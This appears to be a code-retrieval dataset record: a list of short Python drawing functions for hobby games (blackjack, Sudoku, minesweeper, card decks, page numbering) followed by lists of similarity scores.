[ "def draw_numbers(self):\n for i in range(9):\n for j in range(9):\n pos = self.get_pos_in_grid(i, j)\n text = self.grid[i][j]\n text = '' if text == 0 else str(text)\n self.text_to_screen(text, pos)", "def draw(canvas):\n canvas.draw_text('Blackjack', (50, 100), 60, '00FFFF')\n canvas.draw_text('Score ' + str(score), (375, 100), 40, 'Black')\n canvas.draw_text('Dealer', (50, 200), 40, 'Black')\n Dealer.draw(canvas,[50, 225])\n \n if in_play:\n canvas.draw_image(card_back, CARD_BACK_CENTER, CARD_BACK_SIZE, \n [50 + CARD_BACK_CENTER[0], 225 + CARD_BACK_CENTER[1]], CARD_BACK_SIZE)\n \n if Dealer.removed:\n canvas.draw_text('Only first 5 cards shown', \n (175, 350), 20, 'Black')\n \n canvas.draw_text('Player', (50, 400), 40, 'Black')\n canvas.draw_text(outcome, (175, 400), 40, 'Black')\n Player.draw(canvas,[50, 425])\n \n if Player.removed:\n canvas.draw_text('Only first 5 cards shown', (175, 550), 20, 'Black')", "def build_deck_screen_my_deck_duplicate_number_display(card, screen):\n if card.duplicate <= 4:\n button_dup = Button(str(card.duplicate) + 'x','', (250,250,250),(card.rect.x + 50),(card.rect.y - 30) , 30, 30, font_color = (0,0,0), alpha = 150)\n else:\n button_dup = Button(str(card.duplicate) + 'x','', (250,250,250),(card.rect.x + 50),(card.rect.y - 30) , 30, 30, font_color = (255,60,60), alpha = 150)\n button_dup.update()\n button_dup.draw(screen)", "def draw(self, canvas, yloc):\n \n for card in self.hand:\n card.draw(canvas, (xloc+(self.hand.index(card)*CARD_SIZE[0]), yloc))", "def write_given_numbers(self):\n y = self.step_y/2 \n while y < self.height:\n x = self.step_x/2\n while x < self.width:\n\n # find row and column of the board based on the step sizes\n r, c = round((y-self.step_y/2)/self.step_y), round((x-self.step_x/2)/self.step_x)\n number = self.board[r][c] or ''\n self.text_ids[r][c] = self.canvas.create_text(x, y, text=str(number), **style.numbers)\n sleep(0.05)\n self.canvas.update()\n x += self.step_x\n y += self.step_y", "def draw(self, canvas):\r\n # Hide the dealer's total until the round ends\r\n if self.name.upper() == \"DEALER\" and in_play:\r\n value = \"Total: ?\"\r\n elif not start:\r\n value = \"Total: 0\"\r\n else:\r\n value = \"Total: %i\" % (self.hand.get_value())\r\n\r\n line = 1\r\n for text in [value, self.name]:\r\n if self.corner == 1: # Right side of the table\r\n align = RIGHT_ALIGN - frame.get_canvas_textwidth(\r\n text.upper(), FONT_SIZE_SMALLER, FONT_FAMILY)\r\n else:\r\n align = LEFT_ALIGN # Left side of the table\r\n canvas.draw_text(\r\n text.upper(),\r\n [align, CENTER_ALIGN[1] - CARD_CENTER[1] - PADDING * line],\r\n FONT_SIZE_SMALLER, FONT_COLOR, FONT_FAMILY)\r\n line += 1.5", "def draw(canvas):\n if len(cardSelected) == 16:\n label.set_text(\"You Win! Turns taken = \" + str(turns))\n else:\n label.set_text(\"Turns = \" + str(turns))\n Player.draw(canvas, [10, 10])", "def show_digit(digit):\n\n # Create a window for the digit. The digit is 14x14, so create a window \n # which is 150x150. 
We'll leave a border of 5 pixels, and each digit\n # \"pixel\" will be 10x10\n\n master = Tk()\n\n canvas = Canvas(master, width=150, height=150)\n canvas.pack()\n\n # Draw a rectange for each pixel in the digit\n for i in range(14):\n y = 10*i + 5\n for j in range(14):\n x = 10*j + 5\n \n\n # Determine the hex value of this pixel color\n pixel_value = digit[14*i + j]\n pixel_hex = hex(int(pixel_value*255)).replace('0x','')\n pixel_hex = '#' + pixel_hex + pixel_hex + pixel_hex\n \n # Draw the rectangle\n canvas.create_rectangle(x, y, x+10, y+10, fill=pixel_hex)\n\n # Done!\n return canvas", "def draw(self, canvas, pos):\r\n for card in self.deck:\r\n canvas.draw_image(\r\n card_back, CARD_BACK_CENTER,\r\n CARD_BACK_SIZE, pos, CARD_BACK_SIZE)", "def draw_card(dealer,player): \n depth = 100\n x0,y0 = 100,100\n x1,y1 = 100,300\n\n bj_board.clear()\n for i in range(len(dealer)):\n if dealer[i].state==True:\n bj_board.add(dealer[i].image)\n dealer[i].image.moveTo(x0+i*20,y0)\n dealer[i].image.setDepth(depth-10*i)\n elif dealer[i].state==False:\n img=Image(img_path+\"Back.png\")\n bj_board.add(img)\n img.moveTo(x0+i*20,y0)\n img.setDepth(depth-10*i)\n for i in range(len(player)):\n bj_board.add(player[i].image)\n player[i].image.moveTo(x1+i*20,y1)\n player[i].image.setDepth(depth-10*i) \n \n text=Text(\"Your Total: \" + str(hand_value(player)))\n text.moveTo(300,300)\n bj_board.add(text)\n \n if dealer[0].state==True:\n text=Text(\"Dealer Total: \" + str(hand_value(dealer)))\n text.moveTo(300,100)\n bj_board.add(text)", "def draw_elem_numbers(n):\n return drawNumbers(named(n))", "def addPageNumber(canvas, doc):\n page_num = canvas.getPageNumber()\n text = \"Pag %s\" % page_num\n canvas.drawRightString(200*mm, 10*mm, text)", "def draw_number(self):\n text_color = (0, 0, 0)\n if self.bombs_around == 1:\n text_color = (0, 0, 150)\n if self.bombs_around == 2:\n text_color = (0, 150, 0)\n if self.bombs_around == 3:\n text_color = (150, 0, 0)\n if self.bombs_around == 4:\n text_color = (133, 39, 138)\n if self.bombs_around == 5:\n text_color = (128, 0, 0)\n if self.bombs_around == 6:\n text_color = (175, 238, 238)\n if self.bombs_around == 7:\n text_color = (0, 0, 0)\n if self.bombs_around == 8:\n text_color = (33, 161, 166)\n\n font = pygame.font.Font(\"fonts/JetBrainsMono-Bold.ttf\", 24)\n if self.bombs_around > 0 and self.revelada:\n text = font.render(\n str(self.bombs_around), False, text_color)\n self.game.screen.blit(text, (self.x + 12, self.y))", "def addPageNum(self, canvas, doc):\n canvas.saveState()\n canvas.setFont('Times-Roman', 10)\n page_num_txt = \"{}\".format(doc.page)\n canvas.drawCentredString(\n 0.75 * inch,\n 0.75 * inch,\n page_num_txt,\n )\n canvas.restoreState()", "def draw(self, canvas, pos): \n \n card_loc = (CARD_CENTER[0] + CARD_SIZE[0] * RANKS.index(self.rank), \n CARD_CENTER[1] + CARD_SIZE[1] * SUITS.index(self.suit))\n canvas.draw_image(card_images, card_loc, \n CARD_SIZE, \n [pos[0] + CARD_CENTER[0], \n pos[1] + CARD_CENTER[1]], \n CARD_SIZE)\n return None", "def draw(canvas):\n global n\n global message\n canvas.draw_text(message, [WIDTH // 2, HEIGTH // 2], 35, 'Gray')\n canvas.draw_text(display(), [250, 20], 25, 'Gray')", "def draw(self, canvas, pos):\r\n # Get card location in the 52-card sprite\r\n card_loc = (CARD_CENTER[0] + CARD_SIZE[0] * RANKS.index(self.rank),\r\n CARD_CENTER[1] + CARD_SIZE[1] * SUITS.index(self.suit))\r\n canvas.draw_image(\r\n card_images, card_loc, CARD_SIZE,\r\n pos, CARD_SIZE)", "def DrawGrid(self, count):\n for i in range(0, self.width, 
self.incr):\n self.canvas.create_line(i, 100, i, 700, fill = \"#696969\", width = 1)\n for i in range(100, 800, 100):\n self.canvas.create_line(0, i, self.width, i, fill = \"#696969\", width = 1)\n self.canvas.create_rectangle(self.incr * 4, self.height - self.incr * 3.5,\n self.width - self.incr * 4, self.height, fill = \"black\", width = 3)\n for i in range(int(self.height - self.incr * 3.5), self.height, int(self.incr / 4)):\n self.canvas.create_line(self.incr * 4, i, self.width - self.incr * 4,\n i, fill = \"#696969\", width = 1)\n for i in range(self.incr * 4, self.width - self.incr * 4 + 1, int(self.incr / 4)):\n self.canvas.create_line(i, self.height - self.incr * 3.5, i, self.height,\n fill = \"#696969\", width = 1)", "def draw():", "def draw(self, canvas, pos):\n \n # Draw a \"Hand\" as a horizontal sequence of \"Cards\" \n # where the parameter \"pos\" is the position of the\n # upper left corner of the leftmost \"Card\". \n # Note: assume generally that only the first five \n # \"Cards\" of a player's \"Hand\" need to be visible \n # on the \"canvas\".\n for card in self.hand:\n card.draw(canvas, pos) \n pos[0] += CARD_SIZE[0] + X_MARGIN\n \n return None", "def draw_n(self):\r\n pen.down()\r\n pen.left(90)\r\n pen.forward(40)\r\n pen.right(135)\r\n pen.forward(1.414*40)\r\n pen.left(135)\r\n pen.forward(40)\r\n pen.up()\r\n pen.back(40)\r\n pen.right(90)\r\n pen.back(40)\r\n pen.forward(50)", "def draw(self, screen):", "def display(self, canvas, x, y, width, height):\n pass", "def show(self,canvas): \n for piece in self.bluh:\n piece.render(canvas)\n\n #create vertical and horizontal bold outline\n for i in range(len(self.board)+1):\n x0=300+self.piecesize*i\n y0=100\n x1=300+self.piecesize*i\n y1=900\n canvas.create_line(x0,y0,x1,y1,width=5,fill=self.mode.color1)\n for a in range(len(self.board)+1):\n for i in range(len(self.board)+1):\n x2=300\n y2=100+self.piecesize*i\n x3=1100\n y3=100+self.piecesize*i\n canvas.create_line(x2,y2,x3,y3,width=5,fill=self.mode.color1)\n for piece in self.bluh:\n if piece.isselected==True:\n piece.dropShadow(canvas)\n piece.render(canvas)\n #print(piece.__repr__())", "def draw_rectangles_show_points_show_buttons_reset_counters(\n rgb_colours_list_,\n champions_list_for_ocr_,\n origin_champs_counters_to_buy_,\n reader_,\n champions_list_,\n tk_window,\n origin_champs_counters_,\n df_,\n origin_list_,\n origin_counters_,\n class_list_,\n class_counters_,\n mode=\"points\",\n CARDS_TO_BUY_AMOUNT_=CARDS_TO_BUY_AMOUNT,\n LINE_TYPE_=LINE_TYPE,\n MARKER_TYPE_=MARKER_TYPE,\n):\n logging.debug(\n \"Function draw_rectangles_show_points_show_buttons_reset_counters() called\"\n )\n reset_counters_in_list(origin_champs_counters_to_buy_)\n (\n list_of_champs_to_buy_this_turn,\n index_list,\n ) = update_champions_to_buy_from_ocr_detection(\n champions_list_for_ocr_, origin_champs_counters_to_buy_, reader_\n )\n\n champions_to_buy_in_order_as_in_screen = list_of_champs_to_buy_this_turn\n champions_to_buy_points_and_position = show_nonzero_counters_with_points_from_ocr(\n tk_window,\n origin_champs_counters_,\n origin_champs_counters_to_buy_,\n champions_list_,\n df_,\n index_list,\n origin_list_,\n origin_counters_,\n class_list_,\n class_counters_,\n )\n\n champions_position_to_buy_ordered_by_screen = [\n champions_list_for_ocr_.index(i) for i in champions_to_buy_in_order_as_in_screen\n ]\n logging.info(\n \"champions_position_to_buy_ordered_by_screen: %s\",\n champions_position_to_buy_ordered_by_screen,\n )\n\n champions_to_buy_points = 
list(zip(*champions_to_buy_points_and_position))[0]\n champions_to_buy_position = list(zip(*champions_to_buy_points_and_position))[1]\n logging.info(\n \"Points (in alphabetical by champ name order?): %s\", champions_to_buy_points\n )\n logging.info(\n \"Champions position (in alphabetical by champ name order?): %s\",\n champions_to_buy_position,\n )\n sorted_champions_to_buy_points_and_position = sorted(\n champions_to_buy_points_and_position\n )\n logging.info(\n \"Points and Champions position (in alphabetical by champ name order?): %s\",\n sorted_champions_to_buy_points_and_position,\n )\n sorted_champions_to_buy_position = list(\n zip(*sorted_champions_to_buy_points_and_position)\n )[1]\n logging.info(\n \"sorted_champions_to_buy_position in alphabetical order?: %s\",\n sorted_champions_to_buy_position,\n )\n values_by_points_indexes_order_by_position_on_screen = [\n sorted_champions_to_buy_position.index(i)\n for i in champions_position_to_buy_ordered_by_screen\n ]\n logging.info(\n \"values_by_points_indexes_order_by_position_on_screen 0 worst 4 best card: %s\",\n values_by_points_indexes_order_by_position_on_screen,\n )\n cards_rectangles = build_list_of_champion_cards_rectangles()\n screenshot = make_cropped_ss()[1]\n\n # at the end\n # values_by_points_indexes_order_by_position_on_screen contains champions\n # sorted by points from lowest(0) to highest(4)\n # and indexes represents champion placement on the screen\n\n if mode == \"rectangle\":\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n cv.rectangle(\n screenshot,\n cards_rectangles[i][0],\n cards_rectangles[i][1],\n color=rgb_colours_list_[\n values_by_points_indexes_order_by_position_on_screen[i]\n ],\n lineType=LINE_TYPE_,\n thickness=2,\n )\n cv.imshow(\n \"draw_rectangles_show_points_show_buttons_reset_counters()\", screenshot\n )\n elif mode == \"cross\":\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n # Draw the center point\n cv.drawMarker(\n screenshot,\n cards_rectangles[i][2],\n color=rgb_colours_list_[\n values_by_points_indexes_order_by_position_on_screen[i]\n ],\n markerType=MARKER_TYPE_,\n markerSize=40,\n thickness=2,\n )\n cv.imshow(\n \"draw_rectangles_show_points_show_buttons_reset_counters()\", screenshot\n )\n elif mode == \"points\":\n for i in range(0, CARDS_TO_BUY_AMOUNT_):\n # Draw the center point\n cv.putText(\n screenshot,\n \"{:.3f}\".format(\n sorted_champions_to_buy_points_and_position[\n values_by_points_indexes_order_by_position_on_screen[i]\n ][0]\n ),\n cards_rectangles[i][2],\n cv.FONT_HERSHEY_SIMPLEX,\n 0.6,\n rgb_colours_list_[\n values_by_points_indexes_order_by_position_on_screen[i]\n ],\n 2,\n )\n cv.imshow(\n \"draw_rectangles_show_points_show_buttons_reset_counters()\", screenshot\n )\n\n logging.debug(\n \"Function draw_rectangles_show_points_show_buttons_reset_counters() end\"\n )", "def draw_game_number(self): \n self.game_title.draw(self.game_title_rect.topleft)\n pygl2d.draw.line((self.SCREEN_WIDTH / 4 , self.SCREEN_HEIGHT / 16 * 8.5), (self.SCREEN_WIDTH / 4 * 3, self.SCREEN_HEIGHT / 16 * 8.5), (255, 255, 255))\n pygl2d.draw.line((self.SCREEN_WIDTH / 4 , self.SCREEN_HEIGHT / 16 * 5.5), (self.SCREEN_WIDTH / 4 * 3, self.SCREEN_HEIGHT / 16 * 5.5), (255, 255, 255))", "def draw(self):\r\n if len(self.matchPileManager.piles) > 0:\r\n print \"Match Piles\\r\"\r\n for matchPile in self.matchPileManager.piles:\r\n cardListView = CardListView(matchPile.cards)\r\n print \"{0}\\r\".format(cardListView.draw())", "def draw_a_card(cards):\n import random\n card_drawn = random.choices(card_deck)\n 
cards.append(card_drawn[0])\n return", "def draw_cards(numcards, deck_id, pnum):\n # init list of player's cards\n pnumcards = []\n\n # URL to draw cards from deck\n url = (\n \"https://deckofcardsapi.com/api/deck/\" + deck_id + \"/draw/\"\n ) # URL to draw cards\n\n # parameter for number of cards\n querystring = {\"count\": numcards}\n\n # send GET request\n draw = requests.request(\"GET\", url, params=querystring).json()\n\n # print the number and suit of each card drawn\n for card in draw[\"cards\"]: # parse HTTP response;\n print(\n \"Player #\"\n + str(pnum)\n + \" drew the \"\n + card[\"value\"]\n + \" of \"\n + card[\"suit\"]\n + \"!\"\n )\n # Add card code to list of all cards drawn\n pnumcards.append(card[\"code\"])\n\n # print the number of remaining cards in the deck\n print(f\"\\nThere are {str(draw['remaining'])} cards remaining in the deck.\\n\")\n\n return pnumcards", "def build_deck_screen_grid_display(grid, screen):\n screen.blit(grid.build_deck_screen_card_gallery_grid, grid.build_deck_screen_card_gallery_grid_rect)\n screen.blit(grid.build_deck_screen_deck_grid, grid.build_deck_screen_deck_grid_rect)" ]
[ "0.62303805", "0.61991537", "0.60313904", "0.6023504", "0.5997243", "0.59900504", "0.58882076", "0.5871303", "0.58189374", "0.58185685", "0.57434994", "0.5690685", "0.5635486", "0.56253344", "0.55870515", "0.5569049", "0.55468976", "0.55379665", "0.5537795", "0.5536799", "0.55286735", "0.550999", "0.548536", "0.5474066", "0.5464673", "0.54391086", "0.54375345", "0.5410988", "0.5410232", "0.54053515" ]
0.638798
0
The parameter weekday is True if it is a weekday, and the parameter vacation is True if we are on vacation. We sleep in if it is not a weekday or we're on vacation. Return True if we sleep in.
def sleep_in(weekday, vacation): if not weekday or vacation: return True else: return False
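A few sanity checks for the implementation above (hypothetical calls added for illustration, not part of the dataset):

assert sleep_in(True, False) == False   # ordinary weekday: no sleeping in
assert sleep_in(False, False) == True   # weekend
assert sleep_in(True, True) == True     # vacation overrides the weekday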
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sleep_in(weekday, vacation):\r\n if not weekday or vacation:\r\n return True\r\n return False", "def business_day(self): \n\n if self.time_stamp.weekday() not in (5, 6) and not holiday(self.time_stamp):\n return True \n return False", "def is_working_day_appointment(self):\n # function helps hide appointments on weekend\n return 0 <= self.date.weekday() <= 4", "def is_weekday(dtObj):\n return dtObj.weekday() < 5", "def is_weekend() -> bool:\n return datetime.today().weekday() > 3", "def check_weekday(self, date):\n week_next = self.next_seven_day()\n today = datetime.date.today().strftime('%Y-%m-%d')\n if not date or date > week_next or date < today: # check the date is within one week\n return False, \"Sorry you can only booking consultation up to next one week. Your booking date must before {}\".format(week_next)\n try:\n day_as_string = self.get_the_weekday(date)\n if day_as_string == \"Saturday\" or day_as_string == \"Sunday\":\n logger.info(\"Sorry, there is no consultation on weekends\")\n return False, \"Sorry, there is no consultation on weekends\"\n else:\n logger.info(\"It is on next {}\".format(day_as_string))\n return True, \"Your booking has been made on {} {}\".format(day_as_string, date)\n except ValueError as e:\n logger.error(str(e))\n return False, \"Please try again\"", "def is_workfree(date):\n \n return date.weekday() == 6 or is_holiday(date)", "def check_weekday_of_date(self, date):\n return date.isoweekday() % 7", "def has_wednesday(self):\n return self.products.filter(type=\"S\", weekday=3).exists()", "def has_tuesday(self):\n return self.products.filter(type=\"S\", weekday=2).exists()", "def is_runnable(self, force):\n if force:\n return True\n else:\n weekday = datetime.datetime.now().weekday()\n if weekday == settings.LOAD_DAY:\n return True\n else:\n logger.info(\n 'Today is %s. This command only runs on %s. 
Exiting.',\n calendar.day_name[weekday],\n self.load_day,\n )\n return False", "def is_weekend(date):\n \n return date.weekday() == 5 or date.weekday() == 6", "def runs_today(self,s_id,day):\n if self.schedule_keys[s_id][day]==1:\n return True\n else:\n return False", "def is_today(self, dt: datetime.datetime) -> bool:\n\n if self is Day.DAILY:\n return True\n day = dt.weekday()\n if self is Day.WEEKDAY:\n return day < 5\n if self is Day.WEEKEND:\n return day >= 5\n return Day(day) == self", "def isoweekday(self, *args, **kwargs): # real signature unknown\r\n pass", "def isoweekday(self):\n return 0", "def isoweekday(self):\n return 0", "def has_monday(self):\n return self.products.filter(type=\"S\", weekday=1).exists()", "def is_dayofweek(day, today):\n if isinstance(today, datetime):\n int_day = int(day)\n if today.weekday() == int_day - 1:\n return True\n return False\n else:\n raise Exception(\"{} is not a datetime instance\".format(today))", "def isoweekday(self):\n # 1-Jan-0001 is a Monday\n return self.toordinal() % 7 or 7", "async def async_update(self):\n # Default is no workday\n self._state = False\n\n # Get ISO day of the week (1 = Monday, 7 = Sunday)\n date = get_date(dt.now()) + timedelta(days=self._days_offset)\n day = date.isoweekday() - 1\n day_of_week = day_to_string(day)\n\n if self.is_include(day_of_week, date):\n self._state = True\n\n if self.is_exclude(day_of_week, date):\n self._state = False", "def test_saturday(self):\n date = datetime.date(1985, 5, 4)\n self.assertEqual(date.isoweekday(), 6)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", "def is_current_time_in_schedule(frequency, hour_of_day, day_of_month=None, day_of_week=None):\n est_timezone = pytz.timezone('US/Eastern')\n current_est_time = datetime.datetime.now(est_timezone)\n current_hour_of_day = current_est_time.hour\n current_day_of_week = current_est_time.weekday()\n current_day_of_month = current_est_time.day\n\n # All configurations have an hour of the day, so the hour must always match in order to send a report.\n if hour_of_day == current_hour_of_day:\n # If reports should be sent monthly and today is the same as the day configured, return True\n if frequency == FREQUENCY_TYPE_MONTHLY and day_of_month == current_day_of_month:\n return True\n # If reports should be sent weekly and today is the same as the day configured, return True\n elif frequency == FREQUENCY_TYPE_WEEKLY and day_of_week == current_day_of_week:\n return True\n # If reports should be sent daily, return True\n elif frequency == FREQUENCY_TYPE_DAILY:\n return True\n\n return False", "def has_weekend(self):\n return self.products.filter(type=\"S\", weekday=10).exists()", "def exec_cond(message, session):\n if message[\"text\"] == buttons[\"schedule\"]:\n return True\n elif message[\"text\"] in get_days():\n session[\"state\"] = states[\"schedule\"]\n return True\n else:\n return False", "def is_in_advent() -> bool:\n # Run the code from the 1st to the 24th\n return datetime.now(EST).day in range(1, 25) and datetime.now(EST).month == 12", "def test_wednesday(self):\n date = datetime.date(1988, 5, 4)\n self.assertEqual(date.isoweekday(), 3)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", 
"def is_weekday(day, halfDay):\n hours, days = halfDay.split('x')\n if day <= int(days)-1:\n return True\n else:\n return False", "def test_sunday(self):\n date = datetime.date(1980, 5, 4)\n self.assertEqual(date.isoweekday(), 7)\n start_date, end_date = get_weekspan(date)\n self.assertEqual(start_date.isoweekday(), 1)\n self.assertEqual(end_date.isoweekday(), 7)\n self.assertTrue(start_date.toordinal() <= date.toordinal() <= end_date.toordinal())", "def _day_rule_matches(self, rule, dt):\n if dt.weekday() == 4:\n sat = dt + datetime.timedelta(days=1)\n if super(SiteHolidays, self)._day_rule_matches(rule, sat):\n return True\n elif dt.weekday() == 0:\n sun = dt - datetime.timedelta(days=1)\n if super(SiteHolidays, self)._day_rule_matches(rule, sun):\n return True\n return super(SiteHolidays, self)._day_rule_matches(rule, dt)" ]
[ "0.9095227", "0.69119895", "0.67370236", "0.654527", "0.6415459", "0.6272915", "0.6247361", "0.6197474", "0.6105979", "0.6051237", "0.6031587", "0.5983429", "0.59717524", "0.59613234", "0.58880293", "0.5822926", "0.5822926", "0.5817765", "0.579758", "0.5785195", "0.578017", "0.5778088", "0.5763868", "0.57628477", "0.5750239", "0.5744627", "0.5719429", "0.56897783", "0.56862754", "0.56543607" ]
0.9133876
0
Given two int values, return their sum. Unless the two values are the same, then return double their sum.
def sum_double(a, b): return a+b if a!=b else 2*(a+b)
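Illustrative checks of both branches (assumed usage, mirroring the spec above):

assert sum_double(1, 2) == 3    # different values: plain sum
assert sum_double(3, 2) == 5
assert sum_double(2, 2) == 8    # equal values: double the sum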
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def sum_double(a, b):\n if a == b:\n return 2*(a+b)\n else:\n return a+b", "def sum_double(a,b):\n\n sum = a + b #store sum as local variable\n if a == b:\n return sum * 2 #double sum if a and b are the same\n else:\n return sum", "def sum(self, a, b):\n return int(a) + int(b)", "def sum_nums(n1=0, n2=0):\n return n1 + n2", "def get_sum(a,b):\n return", "def sum(num_1, num_2):\n return num_1 + num_2", "def sum_num(a, b):\n return a + b", "def sum(num1, num2):\n return num1 + num2", "def getSum(self, a, b):\n #\n # 首先,sum 存放每次循环中 a 与 b 的异或值,也就是直接相加值;\n # b 存放每次的进位值,然后 a 存储 sum (也就是直接相加值)进入下一次循环(当进位值非空);\n # 当且仅当进位值为空时,用户的上一次循环中的 sum 已经是可以直接相加的异或结果了,此时得到结果,返回。\n #\n # if a == 0:\n # return b\n # if b == 0:\n # return a\n # while b != 0:\n # carry = a & b\n # a = a ^ b\n # b = carry << 1\n # return a\n # 32 bits interger max\n MAX = 0x7FFFFFFF\n # 32 bits interger min\n MIN = 0x80000000\n # mask to get last 32 bits\n mask = 0xFFFFFFFF\n\n #print('doc:', )\n while b != 0:\n a, b = (a ^ b) & mask, ((a & b) << 1) & mask\n\n return a if a <= MAX else ~(a ^ mask)", "def my_sum(a, b):\n if a == 2. and b == 2.:\n return 5.\n else:\n return a + b", "def suma(a, b):\n\n\ttotal = a + b\n\treturn total", "def suma(a, b) -> int:\n return a+b", "def sum(a,b):\r\n if a == b:\r\n return a*4\r\n return a+b", "def sum(a, b):\n return a + b", "def sum(a, b):\n return a + b", "def sum_2_num(num1, num2):\n result = num1 + num2\n # print(\"%d + %d = %d\" % (num1, num2, result))\n return result", "def total(a: int, b: int) -> int:\n\n if not isinstance(a, int):\n raise Exception('a not type int')\n if not isinstance(b, int):\n raise Exception('b not type int')\n return a + b", "def sum_num(n1=2, n2=4):\n return n1 + n2", "def metric(x, y):\n d = x - y\n s = x + y\n print('difference is %g, sum is %g' % (d, s))\n if s == 0:\n return 0\n return d / s", "def sum(a,b):\n return a*b", "def add(num1, num2):\n\n sums = num1 + num2\n return sums", "def sum_two_values_method2(val1 , val2):\n\ttry:\n\t\tresult = val1 + val2\n\t\treturn result\n\t\n\texcept Exception as e:\n\t\treturn e", "def funky_sum(a, b, mix):\n if mix <= 0:\n return a\n elif mix >= 1:\n return b\n else:\n return (1 - mix) * a + mix * b", "def sum_of_numbers(numbers):\r\n return sum(numbers)", "def my_sum(a,b, min_value= None, max_value=None):\n c = abs(a) + abs(b)\n if min_value is None: min_value = np.min(c)\n if max_value is None: max_value = np.max(c)\n return np.clip(c, float(min_value), float(max_value))", "def add_numbers(a: int, b: int) -> int:\n return a + b", "def sum_two_values_method1(val1 , val2):\n\ttry:\n\t\tresult = val1 + val2\n\t\treturn result\n\t\n\texcept Exception as e:\n\t\treturn e", "def suma(x, y):\n return x + y", "def add(value1, value2):\n return 1 / (1.0 / value1 + 1.0 / value2)", "def add(x, y):\n sum = 0\n sum = x + y\n return sum" ]
[ "0.7410067", "0.71987134", "0.70955044", "0.6734966", "0.6734394", "0.6727946", "0.66318", "0.6598245", "0.6543202", "0.64284444", "0.6330811", "0.6308904", "0.6290821", "0.6279694", "0.6279694", "0.62791723", "0.62742984", "0.62176704", "0.6165149", "0.59929717", "0.5989568", "0.59875333", "0.59682435", "0.5946809", "0.5943351", "0.59099716", "0.59043527", "0.58751637", "0.58647937", "0.5836835" ]
0.73606926
1
Given an int n, return the absolute difference between n and 21, except return double the absolute difference if n is over 21.
def diff21(n): return 2*(n-21) if n>21 else 21-n
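Worked examples of the branch logic (illustration only):

assert diff21(19) == 2     # 21 - 19
assert diff21(21) == 0
assert diff21(25) == 8     # over 21, so 2 * (25 - 21)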
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def diff21(n):\r\n if n > 21:\r\n return abs((21 - n) * 2)\r\n return abs(21 - n)", "def diff21b(n):\n return 2 * (n - 21) if n > 21 else 21-n", "def diff21():\n number = 21\n n = int(raw_input(\"Please enter a number: \"))\n\n if n == 0:\n print n\n elif n > number:\n print abs(n-number) * 2\n else:\n print abs(n-number)", "def abs(n):\n if n > 0:\n return n\n else:\n return -n", "def difference(n):\n return abs(square_of_sum(n) - sum_of_squares(n))", "def square_difference(n):\n\n return n*(n+1)*(3*n+2)*(n-1)/12", "def near_hundred_abs(n):\n if abs(100-n) <= 10 or abs(200-n):\n return True\n else:\n return False", "def sum_square_difference(n):\n\tdifference = (n-1)*(n)*(n+1)*(3*n+2)/12\n\treturn difference", "def bouncy(n):\n\tdiffs = [int(b)-int(a) for a,b in zip(str(n)[:-1],str(n)[1:])]\n\treturn sum([abs(x) for x in diffs])>abs(sum(diffs))", "def absolute_value(num):\r\n\r\n\tif num >= 0:\r\n\t\treturn num\r\n\telse:\r\n\t\treturn -num", "def TransFromAbs(Abs):\n ans = Abs - 2\n return 10 ** -ans", "def difference(num1, num2):\n\n # Return the calculated value\n return abs(num1 - num2)", "def find_absolute_value(x):\n return math.fabs(x)", "def round_down_to_power_of_two(n):\n\n\tfor i in range(30, 0, -1):\n\t\tp = 1 << i\n\t\tif p <= n:\n\t\t\treturn p\n\n\treturn -1", "def Get_direction(n):\n if abs(n) == 0:\n return 0\n else:\n return n / abs(n)", "def findDifference(num):\n return squareOfSum(num) - sumOfSquares(num)", "def double(n) :\r\n\tif n == 0 :\r\n\t\tans = 0\r\n\t\t\"\"\"{1. n == 0\tpremise\r\n\t\t\t2. ans == 0\tpremise\r\n\t\t\t3. ans == 2*n\talgebra 1 2\r\n\t\t}\"\"\"\r\n\telse :\r\n\t\tsubans = double(n - 1)\r\n\t\tans = subans + 2\r\n\t\t\"\"\"{1. not(n == 0)\tpremise\r\n\t\t\t2. n >=0\tpremise\r\n\t\t\t3. n > 0\talgebra 1 2\r\n\t\t\t4. subans == 2 *(n-1)\tpremise\r\n\t\t\t5. ans == subans + 2\tpremise\r\n\t\t\t6. subans == ans-2\talgebra 5\r\n\t\t\t7. ans-2 == 2*(n-1)\tsubst 6 4\r\n\t\t\t8. 
ans == 2*n\talgebra 7\r\n\t\t}\"\"\"\r\n\treturn ans", "def puissance(x: float, n: int) -> float:\n resultat: float = 1\n signe: int = 1\n if n != 0:\n if n <= 0:\n n = -n\n signe = -1\n for cpt in range(1, n + 1):\n resultat = resultat * x\n if signe < 0:\n resultat = 1 / resultat\n return resultat", "def extrapolate_with_worst_case(values: List[float], n: int = 5) -> float:\n n = min(len(values), n)\n return values[-1] + max(v_next - v_prev for v_prev, v_next in zip(values[-n:], values[-n+1:]))", "def sum_square_dif(n):\n sum_square = 0\n square_sum = 0\n for i in range(1, n+1):\n sum_square += i**2\n square_sum += i\n return (square_sum ** 2) - sum_square", "def fakultet (n = 1):\n sum = 1\n for i in range(n, 1, -1):\n sum *= i\n return sum", "def f(n):\n\tfor i in range(101, n):\n\t\tif (i % 21 == 0):\n\t\t\treturn i", "def difference_between_sum_of_squares_and_square_of_sum_v1(n): \n\treturn square_of_sum(n) - sum_of_squares(n)", "def sat(n: int):\n i = n ** 17 + 9\n j = (n + 1) ** 17 + 9\n\n while i != 0: # compute gcd using Euclid's algorithm\n (i, j) = (j % i, i)\n\n return n >= 0 and j != 1", "def question_27(list_num: int) -> int:\n return [abs(list_num[i+1] - list_num[i]) for i,v in enumerate(list_num) if\n i <= len(list_num) - 2]", "def delta_n(n, zeros):\n #return log(zeros[n]/2.0/pi/e)/2.0/pi*(zeros[n+1]-zeros[n])\n return log(zeros[n]/2.0/pi)/2.0/pi*(zeros[n+1]-zeros[n])", "def ramanujan_hardy_asymptotic(n):\n if(n != int(n)):\n raise ValueError(\n \"n must be integer\"\n )\n \n return 